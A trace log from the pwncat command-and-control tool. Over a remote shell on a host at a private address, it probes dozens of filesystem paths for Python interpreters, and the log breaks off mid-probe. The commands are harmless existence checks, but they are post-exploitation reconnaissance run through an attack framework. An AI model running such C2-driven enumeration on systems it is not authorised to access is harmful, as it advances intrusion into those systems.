2020-06-12 17:05:32,967 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python && echo /usr/local/python3.8/bin/python || echo;\n'
2020-06-12 17:05:32,967 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,991 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,991 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python2
2020-06-12 17:05:32,991 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,991 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python2 && echo /usr/local/python3.8/bin/python2 || echo;\n'
2020-06-12 17:05:32,991 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,016 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,016 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python2.7
2020-06-12 17:05:33,016 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,017 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python2.7 && echo /usr/local/python3.8/bin/python2.7 || echo;\n'
2020-06-12 17:05:33,017 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,040 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,040 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3
2020-06-12 17:05:33,041 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,041 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python3 && echo /usr/local/python3.8/bin/python3 || echo;\n'
2020-06-12 17:05:33,041 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,065 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,065 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3.5
2020-06-12 17:05:33,065 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,065 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python3.5 && echo /usr/local/python3.8/bin/python3.5 || echo;\n'
2020-06-12 17:05:33,065 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,089 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,090 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3.6
2020-06-12 17:05:33,090 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,090 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python3.6 && echo /usr/local/python3.8/bin/python3.6 || echo;\n'
2020-06-12 17:05:33,090 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,114 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,114 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3.7
2020-06-12 17:05:33,114 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,114 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python3.7 && echo /usr/local/python3.8/bin/python3.7 || echo;\n'
2020-06-12 17:05:33,114 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,139 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,139 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3.8
2020-06-12 17:05:33,140 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,140 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python3.8 && echo /usr/local/python3.8/bin/python3.8 || echo;\n'
2020-06-12 17:05:33,140 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,163 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,163 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python
2020-06-12 17:05:33,164 DEBUG [MainThread] 1803:send(): Trying to send 57 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,164 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python && echo /opt/bin/python || echo;\n'
2020-06-12 17:05:33,164 DEBUG [MainThread] 1826:send(): Sent 57 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,196 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,196 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python2
2020-06-12 17:05:33,196 DEBUG [MainThread] 1803:send(): Trying to send 59 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,196 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python2 && echo /opt/bin/python2 || echo;\n'
2020-06-12 17:05:33,196 DEBUG [MainThread] 1826:send(): Sent 59 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,222 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,222 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python2.7
2020-06-12 17:05:33,222 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,222 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python2.7 && echo /opt/bin/python2.7 || echo;\n'
2020-06-12 17:05:33,222 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,255 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,255 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python3
2020-06-12 17:05:33,255 DEBUG [MainThread] 1803:send(): Trying to send 59 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,255 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python3 && echo /opt/bin/python3 || echo;\n'
2020-06-12 17:05:33,255 DEBUG [MainThread] 1826:send(): Sent 59 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,282 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,283 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python3.5
2020-06-12 17:05:33,283 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,283 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python3.5 && echo /opt/bin/python3.5 || echo;\n'
2020-06-12 17:05:33,283 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,309 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,309 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python3.6
2020-06-12 17:05:33,309 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,309 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python3.6 && echo /opt/bin/python3.6 || echo;\n'
2020-06-12 17:05:33,309 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,334 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,334 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python3.7
2020-06-12 17:05:33,334 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,334 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python3.7 && echo /opt/bin/python3.7 || echo;\n'
2020-06-12 17:05:33,334 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,366 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,366 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python3.8
2020-06-12 17:05:33,366 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,366 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python3.8 && echo /opt/bin/python3.8 || echo;\n'
2020-06-12 17:05:33,366 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,389 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,390 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python
2020-06-12 17:05:33,390 DEBUG [MainThread] 1803:send(): Trying to send 71 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,390 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python && echo /opt/python/bin/python || echo;\n'
2020-06-12 17:05:33,390 DEBUG [MainThread] 1826:send(): Sent 71 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,414 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,414 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python2
2020-06-12 17:05:33,415 DEBUG [MainThread] 1803:send(): Trying to send 73 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,415 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python2 && echo /opt/python/bin/python2 || echo;\n'
2020-06-12 17:05:33,415 DEBUG [MainThread] 1826:send(): Sent 73 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,438 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,438 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python2.7
2020-06-12 17:05:33,439 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,439 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python2.7 && echo /opt/python/bin/python2.7 || echo;\n'
2020-06-12 17:05:33,439 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,462 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,462 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python3
2020-06-12 17:05:33,462 DEBUG [MainThread] 1803:send(): Trying to send 73 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,462 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python3 && echo /opt/python/bin/python3 || echo;\n'
2020-06-12 17:05:33,462 DEBUG [MainThread] 1826:send(): Sent 73 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,487 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,487 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python3.5
2020-06-12 17:05:33,487 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,487 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python3.5 && echo /opt/python/bin/python3.5 || echo;\n'
2020-06-12 17:05:33,487 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,511 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,511 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python3.6
2020-06-12 17:05:33,511 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,511 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python3.6 && echo /opt/python/bin/python3.6 || echo;\n'
2020-06-12 17:05:33,511 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,535 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,535 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python3.7
2020-06-12 17:05:33,535 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,535 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python3.7 && echo /opt/python/bin/python3.7 || echo;\n'
2020-06-12 17:05:33,535 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,558 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,559 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python3.8
2020-06-12 17:05:33,559 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,559 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python3.8 && echo /opt/python/bin/python3.8 || echo;\n'
2020-06-12 17:05:33,559 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,583 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,584 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python
2020-06-12 17:05:33,584 DEBUG [MainThread] 1803:send(): Trying to send 73 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,584 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python && echo /opt/python2/bin/python || echo;\n'
2020-06-12 17:05:33,584 DEBUG [MainThread] 1826:send(): Sent 73 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,608 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,608 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python2
2020-06-12 17:05:33,609 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,609 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python2 && echo /opt/python2/bin/python2 || echo;\n'
2020-06-12 17:05:33,609 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,632 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,632 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python2.7
2020-06-12 17:05:33,632 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,632 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python2.7 && echo /opt/python2/bin/python2.7 || echo;\n'
2020-06-12 17:05:33,633 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,658 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,658 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python3
2020-06-12 17:05:33,658 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,658 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python3 && echo /opt/python2/bin/python3 || echo;\n'
2020-06-12 17:05:33,658 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,685 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,685 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python3.5
2020-06-12 17:05:33,685 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,685 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python3.5 && echo /opt/python2/bin/python3.5 || echo;\n'
2020-06-12 17:05:33,685 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,710 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,710 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python3.6
2020-06-12 17:05:33,710 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,710 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python3.6 && echo /opt/python2/bin/python3.6 || echo;\n'
2020-06-12 17:05:33,710 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,734 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,734 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python3.7
2020-06-12 17:05:33,734 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,734 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python3.7 && echo /opt/python2/bin/python3.7 || echo;\n'
2020-06-12 17:05:33,734 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,757 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,757 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python3.8
2020-06-12 17:05:33,758 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,758 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python3.8 && echo /opt/python2/bin/python3.8 || echo;\n'
2020-06-12 17:05:33,758 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,782 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,782 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python
2020-06-12 17:05:33,782 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,782 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python && echo /opt/python2.7/bin/python || echo;\n'
2020-06-12 17:05:33,782 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,806 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,806 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python2
2020-06-12 17:05:33,806 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,806 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python2 && echo /opt/python2.7/bin/python2 || echo;\n'
2020-06-12 17:05:33,806 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,830 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,830 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python2.7
2020-06-12 17:05:33,830 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,830 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python2.7 && echo /opt/python2.7/bin/python2.7 || echo;\n'
2020-06-12 17:05:33,830 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,854 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,854 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3
2020-06-12 17:05:33,854 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,854 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python3 && echo /opt/python2.7/bin/python3 || echo;\n'
2020-06-12 17:05:33,854 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,879 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,879 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3.5
2020-06-12 17:05:33,880 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,880 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python3.5 && echo /opt/python2.7/bin/python3.5 || echo;\n'
2020-06-12 17:05:33,880 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,903 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,903 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3.6
2020-06-12 17:05:33,903 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,903 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python3.6 && echo /opt/python2.7/bin/python3.6 || echo;\n'
2020-06-12 17:05:33,903 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,929 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,929 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3.7
2020-06-12 17:05:33,929 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,929 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python3.7 && echo /opt/python2.7/bin/python3.7 || echo;\n'
2020-06-12 17:05:33,929 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,962 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,962 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3.8
2020-06-12 17:05:33,962 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,962 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python3.8 && echo /opt/python2.7/bin/python3.8 || echo;\n'
2020-06-12 17:05:33,962 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,985 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,985 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python
2020-06-12 17:05:33,985 DEBUG [MainThread] 1803:send(): Trying to send 73 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,985 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python && echo /opt/python3/bin/python || echo;\n'
2020-06-12 17:05:33,986 DEBUG [MainThread] 1826:send(): Sent 73 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,017 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,017 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python2
2020-06-12 17:05:34,017 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,018 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python2 && echo /opt/python3/bin/python2 || echo;\n'
2020-06-12 17:05:34,018 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,049 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,050 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python2.7
2020-06-12 17:05:34,050 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,050 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python2.7 && echo /opt/python3/bin/python2.7 || echo;\n'
2020-06-12 17:05:34,050 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,076 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,076 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python3
2020-06-12 17:05:34,076 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,076 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python3 && echo /opt/python3/bin/python3 || echo;\n'
2020-06-12 17:05:34,076 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,101 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,101 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python3.5
2020-06-12 17:05:34,101 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,101 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python3.5 && echo /opt/python3/bin/python3.5 || echo;\n'
2020-06-12 17:05:34,101 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,127 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,127 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python3.6
